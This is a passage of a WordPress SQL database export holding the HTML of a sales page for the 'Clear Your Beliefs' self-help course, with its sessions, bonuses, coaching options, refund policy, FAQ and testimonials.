src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>”\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior.\n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<strong>– G. J., software developer</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n//', 'Clear Your Beliefs Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-14 14:04:51', '2014-12-14 19:04:51', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2045, 2, '2014-12-14 14:08:13', '2014-12-14 19:08:13', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;<h3 class="widget-title">Ok I&#8217;m convinced</h3>			<a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n\n<strong>It''s that simple.</strong></p>\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p><img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It’s that simple.</strong></p>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<p>Many people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n<p>\nWhy did I say 